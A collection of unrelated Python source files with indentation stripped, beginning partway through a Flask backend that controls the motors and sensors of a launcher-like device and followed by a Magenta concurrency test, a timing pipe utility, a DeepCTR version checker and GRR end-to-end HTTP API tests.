rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_launch_stop', methods=['POST'])
def function_launch_stop():
rc.ForwardM2(address_2,0)
event.clear()
sleep(0.02)
return (''), 204
@app.route('/app_max_pitch', methods=['POST'])
def function_max_pitch():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
pitch_objective = pitch_pulses
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_min_pitch', methods=['POST'])
def function_min_pitch():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
pitch_objective = 0
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_max_lift', methods=['POST'])
def function_max_lift():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
lift_objective = lift_pulses
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_min_lift', methods=['POST'])
def function_min_lift():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_case_open', methods=['POST'])
def function_case_open():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
else:
rc.SpeedDistanceM1M2(address_3, 1500, 6000, 1500, 6000, 1)
return (''), 204
@app.route('/app_case_close', methods=['POST'])
def function_case_close():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
else:
rc.SpeedDistanceM1M2(address_3, -500, 6000, -500, 6000, 1)
return (''), 204
@app.route('/app_home', methods=['POST'])
def function_home():
event.set()
rc.BackwardM1(address, pitch_speed_manual)
rc.BackwardM1(address_2, lift_speed_manual)
rc.BackwardM2(address_2, launch_speed_manual)
#rc.SpeedM2(address_2,-launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
#Missing rotation limit switch
event.clear()
return (''), 204
@app.route('/app_reset_encoders', methods=['POST'])
def function_reset_encoders():
"""This function does NOTHING"""
#rc.ResetEncoders(address)
#rc.ResetEncoders(address_2)
global encoders_ready
encoders_ready = 1 #Encoders have been reset
return (''), 204
@app.route('/app_battery_voltage', methods=['POST'])
def function_battery_voltage():
voltage = round(0.1*rc.ReadMainBatteryVoltage(address)[1],2)
return jsonify(voltage=voltage)
@app.route('/measurements', methods=['GET'])
def data_display():
'''
This function gets the data from the gyrscope and the temp sensor send them to the webpage
'''
# threading.Thread(target = thermo.portread_loop, daemon = False).start()
try:
temp = thermo.read_temp()
except:
temp = 'NaN'
try:
x_rotation = MPU9250.gyro_data()[0]
except:
x_rotation = 'NaN'
try:
y_rotation = MPU9250.gyro_data()[1]
except:
y_rotation = 'NaN'
try:
angle = MPU9250.gyro_data()[2]
except:
angle = 'NaN'
try:
gyro_temp = MPU9250.gyro_data()[3]
except:
gyro_temp = 'NaN'
try:
cpu_temp = MPU9250.gyro_data()[4]
except:
cpu_temp = 'NaN'
return jsonify(temperature=temp,x_rotation=x_rotation,
y_rotation=y_rotation, angle=angle,
gyro_temp=gyro_temp, cpu_temp=cpu_temp)
#Don't forget to add the return variables
@app.route('/app_stop', methods=['POST'])
def function_stop():
"""Using rc.SpeedDistanceM1M2 here would also wash-over remaining buffers?"""
rc.ForwardM1(address,0)
rc.ForwardM2(address,0)
rc.ForwardM1(address_2,0)
rc.ForwardM2(address_2,0)
rc.ForwardM1(address_3,0)
rc.ForwardM2(address_3,0)
event.clear()
sleep(0.02)
return (''), 204
@app.route('/app_standby', methods=['POST'])
def function_standby():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
pitch_objective = 0
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
rotation_objective = 0
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_standby,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
"""Waiting on buffers here would mean we can wait until all motors have stopped before closing the case again"""
event.clear()
return (''), 204
@app.route('/app_prepare', methods=['POST'])
def function_prepare():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
rc.SpeedDistanceM1M2(address_3, 1500, 6000, 1500, 6000, 1) #Open case
if pitch_ready == 0:
pitch_objective = 0
else:
pitch_objective = int(pitch_pulses/(pitch_length/pitch_ready))
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
if rotation_ready == 0:
rotation_objective = 0
else:
rotation_objective = int(rotation_pulses/(rotation_length/rotation_ready))
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
if lift_ready == 0:
lift_objective = 0
else:
lift_objective = int(lift_pulses/(lift_length/lift_ready))
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_launch', methods=['POST'])
def function_launch():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_connect,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
launch_objective = launch_break
launch_actual = launch_connect
launch_increment = launch_objective-launch_actual
rc.SpeedAccelDistanceM2(address_2,launch_acceleration,launch_speed_pulses,launch_increment,0)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_mount', methods=['POST'])
def function_mount():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
pitch_objective = pitch_pulses
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
rotation_objective = 0
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_mount,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_disable_buttons', methods=['POST'])
def function_disable_buttons():
return jsonify(encoders_ready=encoders_ready)
# Testing having the lights and temperature as a part of the backend code
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--clear', action='store_true', help='clear the display on exit')
args = parser.parse_args()
try:
strip.begin()
except NameError as e:
print(f"{e}: name 'strip' is not defined")
except RuntimeError:
print("ws2811_init failed with code -5 (mmap() failed)")
try:
colorWipe(strip, Color(255, 255, 255))
except NameError:
print("'strip is not defined'")
#For starting the thread when booting
event = Event()
Thread(target=relay_activate).start()
if __name__ == "__main__":
try:
app.run('localhost',port=5000, debug=True)
except KeyboardInterrupt:
if args.clear:
colorWipe(strip, Color(0, 0, 0), 10)
|
concurrency_test.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for concurrency."""
import threading
import time
import tensorflow as tf
from magenta.common import concurrency
class ConcurrencyTest(tf.test.TestCase):
def testSleeper_SleepUntil(self):
# Burn in.
for _ in range(10):
concurrency.Sleeper().sleep(.01)
future_time = time.time() + 0.5
concurrency.Sleeper().sleep_until(future_time)
self.assertAlmostEquals(time.time(), future_time, delta=0.005)
def testSleeper_Sleep(self):
# Burn in.
for _ in range(10):
concurrency.Sleeper().sleep(.01)
def sleep_test_thread(duration):
start_time = time.time()
concurrency.Sleeper().sleep(duration)
self.assertAlmostEquals(time.time(), start_time + duration, delta=0.005)
threads = [threading.Thread(target=sleep_test_thread, args=[i * 0.1])
for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
tf.test.main()
|
metered_pipe.py
|
# RA, 2021-11-05
"""
A Pipe analog that records the timestamps of writes and reads.
NB: May require a call to flush() when done.
"""
import collections
import contextlib
import typing
import queue
import time
import multiprocessing
import matplotlib.pyplot
import pandas
import numpy
import inclusive
import plox
INTERVAL_ON_QUEUE_FULL = 1e-5 # seconds
RETRY_FLUSH_ON_QUEUE_FULL = 10
# Pipe will invoke the system send at most at this frequency,
# and buffer locally otherwise. A reasonable value is between
# 1e-6 (system-limited) and 1e-4 (max speed) seconds/send.
SYSTEM_SEND_MAX_FREQUENCY = 1e-4 # seconds / send
class CW:
def __init__(self, q: queue.Queue):
self.q = q
self.n = 0
self.buffer = []
self.last_successful_put = 0
def flush(self):
for retry in range(RETRY_FLUSH_ON_QUEUE_FULL):
try:
self.q.put(
[
(obj, n, s0, time.time())
for (n, (obj, s0)) in enumerate(self.buffer, start=self.n)
],
block=False
)
except queue.Full:
time.sleep(INTERVAL_ON_QUEUE_FULL)
else:
self.last_successful_put = time.time()
self.n += len(self.buffer)
self.buffer = []
return
# Didn't flush this time because the queue is full.
pass
def send(self, obj):
s0 = time.time()
self.buffer.append((obj, s0))
if (s0 < (self.last_successful_put + SYSTEM_SEND_MAX_FREQUENCY)):
pass
else:
self.flush()
@property
def writable(self):
return True
def __del__(self):
if self.buffer:
raise RuntimeError("Pipe `send` buffer is not empty. Call flush() on it.")
class CR:
def __init__(self, q):
self.q = q
self.buffer = []
self._log = collections.deque(maxlen=(2 ** 32))
def fetch(self):
t0 = time.time()
for (obj, n, s0, s1) in self.q.get(block=True):
self.buffer.append(obj)
t1 = time.time()
assert (n == len(self._log))
self._log.append({'s0': s0, 's1': s1, 't0': t0, 't1': t1})
self.q.task_done()
def recv(self):
if not self.buffer:
self.fetch()
obj = self.buffer[0]
self.buffer = self.buffer[1:]
return obj
def flush_log_using(self, f: typing.Callable):
while self._log:
f(self._log.popleft())
@property
def readable(self):
return True
def MeteredPipe(duplex=True, q=None):
if duplex:
raise NotImplementedError
PIPE_BUFFER_SIZE = 2 ** 12
if not q:
# `maxsize` is the number of objects
q = multiprocessing.Manager().Queue(maxsize=PIPE_BUFFER_SIZE)
# Something like this would also work and may be a little faster
# OBJ_SIZE = 1024
# q = faster_fifo.Queue(PIPE_BUFFER_SIZE * OBJ_SIZE)
return (CR(q), CW(q))
def speed_test():
"""
Number of pure .send() calls per second.
while .recv() is running in parallel.
"""
(cr, cw) = MeteredPipe(duplex=False)
def recv(cr):
while True:
if cr.recv() is None:
break
# Prepare consumer process
p = multiprocessing.Process(target=recv, args=(cr,))
p.start()
test_interval = 2
t0 = time.time()
while (time.time() < t0 + test_interval):
cw.send(0)
cw.send(None)
cw.flush()
# Consumer process
p.join(timeout=(test_interval + 1))
return (cw.n - 1) / test_interval
@contextlib.contextmanager
def visualize(cr_logs: list, decimals=3) -> plox.Plox:
np = numpy
df = pandas.DataFrame(data=cr_logs)
assert list(df.columns) == ['s0', 's1', 't0', 't1']
tt = df.s0
# offset each record by its `sent` timestamp
df = (df.T - df.s0).T
# print(df.to_markdown())
# round to `decimals` and offset by the same
rounding = np.ceil
df = df.applymap(
lambda x:
0 if (x == 0) else
np.sign(x) * (1 + max(0, rounding(np.log10(np.abs(x)) + decimals)))
)
from plox import rcParam
style = {
rcParam.Figure.figsize: (16, 1),
rcParam.Axes.linewidth: 0.01,
rcParam.Font.size: 6,
rcParam.Figure.dpi: 720,
}
with plox.Plox(style) as px:
v = int(np.ceil(df.abs().max().max()))
im = px.a.imshow(df.T, aspect='auto', interpolation='none', vmin=(-v * 1.1), vmax=(v * 1.1), cmap='coolwarm')
px.a.set_yticks(np.arange(len(df.columns)))
px.a.set_yticklabels(df.columns)
px.a.set_xlabel("Event")
px.a.invert_yaxis()
cb = px.f.colorbar(im, aspect=3)
cb.set_ticks(inclusive.range[-v, v])
# note the reverse offset by `decimals`
labels = [
fr"$10^{{{np.abs(x) - decimals - 1}}}$s"
if x else "0"
for x in cb.get_ticks()
]
cb.ax.set_yticklabels(labels=labels, fontsize=5)
cb.ax.text(0.5, +v, "behind", ha='right', va='top', rotation=-90)
cb.ax.text(0.5, -v, "ahead", ha='right', va='bottom', rotation=-90)
# How many events within the last `k` seconds
nn = np.zeros_like(tt)
k = 3e-3 # timescale (seconds)
nn[0] = 1
for ((m, ta), (n, tb)) in zip(enumerate(tt), enumerate(tt[1:], start=1)):
nn[n] = 1 + (nn[m] * np.exp(-(tb - ta) / k))
nn *= (1e-3 / k)
ax: matplotlib.pyplot.Axes = px.a.twinx()
ax.plot(tt.index, nn, c='k', lw=0.2)
ax.set_ylim(-1, max(nn) + 2)
ax.set_ylabel("Events / ms")
# Example usage:
# px.f.savefig(Path(__file__).with_suffix('.png'), dpi=720)
yield px
if __name__ == '__main__':
print(f"MeteredPipe speed test: {speed_test()} sends per second.")
|
utils.py
|
# -*- coding:utf-8 -*-
"""
Author:
Weichen Shen,wcshen1994@163.com
"""
import json
import logging
from threading import Thread
import requests
try:
from packaging.version import parse
except ImportError:
from pip._vendor.packaging.version import parse
def check_version(version):
"""Return version of package on pypi.python.org using json."""
def check(version):
try:
url_pattern = 'https://pypi.python.org/pypi/deepctr/json'
req = requests.get(url_pattern)
latest_version = parse('0')
version = parse(version)
if req.status_code == requests.codes.ok:
j = json.loads(req.text.encode('utf-8'))
releases = j.get('releases', [])
for release in releases:
ver = parse(release)
if ver.is_prerelease or ver.is_postrelease:
continue
latest_version = max(latest_version, ver)
if latest_version > version:
logging.warning(
'\nDeepCTR version {0} detected. Your version is {1}.\nUse `pip install -U deepctr` to upgrade.Changelog: https://github.com/shenweichen/DeepCTR/releases/tag/v{0}'.format(
latest_version, version))
except Exception as e:
print(e)
return
Thread(target=check, args=(version,)).start()
|
http_api_e2e_test.py
|
#!/usr/bin/env python
# -*- mode: python; encoding: utf-8 -*-
"""End-to-end tests for HTTP API.
HTTP API plugins are tested with their own dedicated unit-tests that are
protocol- and server-independent. Tests in this file test the full GRR server
stack with regards to the HTTP API.
"""
import datetime
import json
import logging
import os
import StringIO
import threading
import time
import zipfile
from cryptography import x509
from cryptography.hazmat import backends
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography.x509 import oid
import portpicker
import requests
import unittest
from grr_api_client import api as grr_api
from grr_api_client import errors as grr_api_errors
from grr_api_client import root as grr_api_root
from grr_api_client import utils as grr_api_utils
from grr.gui import api_auth_manager
from grr.gui import api_call_router_with_approval_checks
from grr.gui import webauth
from grr.gui import wsgiapp
from grr.gui import wsgiapp_testlib
from grr.gui.root import api_root_router
from grr.lib import flags
from grr.lib import rdfvalue
from grr.lib import utils
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import crypto as rdf_crypto
from grr.proto import jobs_pb2
from grr.proto.api import vfs_pb2
from grr.server import access_control
from grr.server import aff4
from grr.server import flow
from grr.server.aff4_objects import aff4_grr
from grr.server.aff4_objects import security
from grr.server.authorization import client_approval_auth
from grr.server.flows.general import processes
from grr.server.flows.general import processes_test
from grr.server.hunts import standard_test
from grr.server.output_plugins import csv_plugin
from grr.test_lib import acl_test_lib
from grr.test_lib import fixture_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import hunt_test_lib
from grr.test_lib import test_lib
class ApiSSLE2ETest(test_lib.GRRBaseTest, acl_test_lib.AclTestMixin):
def setUp(self):
super(ApiSSLE2ETest, self).setUp()
key = rdf_crypto.RSAPrivateKey.GenerateKey()
key_path = os.path.join(self.temp_dir, "key.pem")
with open(key_path, "wb") as f:
f.write(key.AsPEM())
subject = issuer = x509.Name([
x509.NameAttribute(oid.NameOID.COMMON_NAME, u"localhost"),
])
cert = x509.CertificateBuilder().subject_name(subject).issuer_name(
issuer).public_key(key.GetPublicKey().GetRawPublicKey()).serial_number(
x509.random_serial_number()).not_valid_before(
datetime.datetime.utcnow()).not_valid_after(
datetime.datetime.utcnow() + datetime.timedelta(days=1)
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"localhost")]),
critical=False,
).sign(key.GetRawPrivateKey(), hashes.SHA256(),
backends.default_backend())
cert_path = os.path.join(self.temp_dir, "certificate.pem")
with open(cert_path, "wb") as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
self.config_overrider = test_lib.ConfigOverrider({
"AdminUI.enable_ssl": True,
"AdminUI.ssl_key_file": key_path,
"AdminUI.ssl_cert_file": cert_path,
})
self.config_overrider.Start()
self.prev_environ = dict(os.environ)
os.environ["REQUESTS_CA_BUNDLE"] = cert_path
self.port = portpicker.PickUnusedPort()
self.thread = wsgiapp_testlib.ServerThread(self.port)
self.thread.StartAndWaitUntilServing()
api_auth_manager.APIACLInit.InitApiAuthManager()
self.token.username = "api_test_robot_user"
webauth.WEBAUTH_MANAGER.SetUserName(self.token.username)
self.endpoint = "https://localhost:%s" % self.port
self.api = grr_api.InitHttp(api_endpoint=self.endpoint)
def tearDown(self):
super(ApiSSLE2ETest, self).tearDown()
self.config_overrider.Stop()
os.environ.clear()
os.environ.update(self.prev_environ)
self.thread.keep_running = False
def testGetClientWorks(self):
# By testing GetClient we test a simple GET method.
client_urn = self.SetupClients(1)[0]
c = self.api.Client(client_id=client_urn.Basename()).Get()
self.assertEqual(c.client_id, client_urn.Basename())
def testSearchClientWorks(self):
# By testing SearchClients we test an iterator-based API method.
clients = list(self.api.SearchClients(query="."))
self.assertEqual(clients, [])
def testPostMethodWorks(self):
client_urn = self.SetupClients(1)[0]
args = processes.ListProcessesArgs(
filename_regex="blah", fetch_binaries=True)
client_ref = self.api.Client(client_id=client_urn.Basename())
result_flow = client_ref.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
self.assertTrue(result_flow.client_id)
class ApiE2ETest(test_lib.GRRBaseTest, acl_test_lib.AclTestMixin):
"""Base class for all API E2E tests."""
def setUp(self):
super(ApiE2ETest, self).setUp()
api_auth_manager.APIACLInit.InitApiAuthManager()
self.token.username = "api_test_robot_user"
webauth.WEBAUTH_MANAGER.SetUserName(self.token.username)
self.port = ApiE2ETest.server_port
self.endpoint = "http://localhost:%s" % self.port
self.api = grr_api.InitHttp(api_endpoint=self.endpoint)
self.poll_stubber = utils.MultiStubber(
(grr_api_utils, "DEFAULT_POLL_INTERVAL", 0.1),
(grr_api_utils, "DEFAULT_POLL_TIMEOUT", 10))
self.poll_stubber.Start()
def tearDown(self):
super(ApiE2ETest, self).tearDown()
self.poll_stubber.Stop()
_api_set_up_lock = threading.RLock()
_api_set_up_done = False
@classmethod
def setUpClass(cls):
super(ApiE2ETest, cls).setUpClass()
with ApiE2ETest._api_set_up_lock:
if not ApiE2ETest._api_set_up_done:
# Set up HTTP server
port = portpicker.PickUnusedPort()
ApiE2ETest.server_port = port
logging.info("Picked free AdminUI port for HTTP %d.", port)
ApiE2ETest.trd = wsgiapp_testlib.ServerThread(port)
ApiE2ETest.trd.StartAndWaitUntilServing()
ApiE2ETest._api_set_up_done = True
class ApiClientLibFlowTest(ApiE2ETest):
"""Tests flows-related part of GRR Python API client library."""
def testSearchWithNoClients(self):
clients = list(self.api.SearchClients(query="."))
self.assertEqual(clients, [])
def testSearchClientsWith2Clients(self):
client_urns = sorted(self.SetupClients(2))
clients = sorted(
self.api.SearchClients(query="."), key=lambda c: c.client_id)
self.assertEqual(len(clients), 2)
for i in range(2):
self.assertEqual(clients[i].client_id, client_urns[i].Basename())
self.assertEqual(clients[i].data.urn, client_urns[i])
def testListFlowsFromClientRef(self):
client_urn = self.SetupClients(1)[0]
flow_urn = flow.GRRFlow.StartFlow(
client_id=client_urn,
flow_name=processes.ListProcesses.__name__,
token=self.token)
flows = list(self.api.Client(client_id=client_urn.Basename()).ListFlows())
self.assertEqual(len(flows), 1)
self.assertEqual(flows[0].client_id, client_urn.Basename())
self.assertEqual(flows[0].flow_id, flow_urn.Basename())
self.assertEqual(flows[0].data.urn, flow_urn)
def testListFlowsFromClientObject(self):
client_urn = self.SetupClients(1)[0]
flow_urn = flow.GRRFlow.StartFlow(
client_id=client_urn,
flow_name=processes.ListProcesses.__name__,
token=self.token)
client = self.api.Client(client_id=client_urn.Basename()).Get()
flows = list(client.ListFlows())
self.assertEqual(len(flows), 1)
self.assertEqual(flows[0].client_id, client_urn.Basename())
self.assertEqual(flows[0].flow_id, flow_urn.Basename())
self.assertEqual(flows[0].data.urn, flow_urn)
def testCreateFlowFromClientRef(self):
client_urn = self.SetupClients(1)[0]
args = processes.ListProcessesArgs(
filename_regex="blah", fetch_binaries=True)
children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren()
self.assertEqual(len(list(children)), 0)
client_ref = self.api.Client(client_id=client_urn.Basename())
result_flow = client_ref.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren()
self.assertEqual(len(list(children)), 1)
result_flow_obj = aff4.FACTORY.Open(result_flow.data.urn, token=self.token)
self.assertEqual(result_flow_obj.args, args)
def testCreateFlowFromClientObject(self):
client_urn = self.SetupClients(1)[0]
args = processes.ListProcessesArgs(
filename_regex="blah", fetch_binaries=True)
children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren()
self.assertEqual(len(list(children)), 0)
client = self.api.Client(client_id=client_urn.Basename()).Get()
result_flow = client.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren()
self.assertEqual(len(list(children)), 1)
result_flow_obj = aff4.FACTORY.Open(result_flow.data.urn, token=self.token)
self.assertEqual(result_flow_obj.args, args)
def testListResultsForListProcessesFlow(self):
process = rdf_client.Process(
pid=2,
ppid=1,
cmdline=["cmd.exe"],
exe="c:\\windows\\cmd.exe",
ctime=long(1333718907.167083 * 1e6),
RSS_size=42)
client_urn = self.SetupClients(1)[0]
client_mock = processes_test.ListProcessesMock([process])
flow_urn = flow.GRRFlow.StartFlow(
client_id=client_urn,
flow_name=processes.ListProcesses.__name__,
token=self.token)
for _ in flow_test_lib.TestFlowHelper(
flow_urn, client_mock, client_id=client_urn, token=self.token):
pass
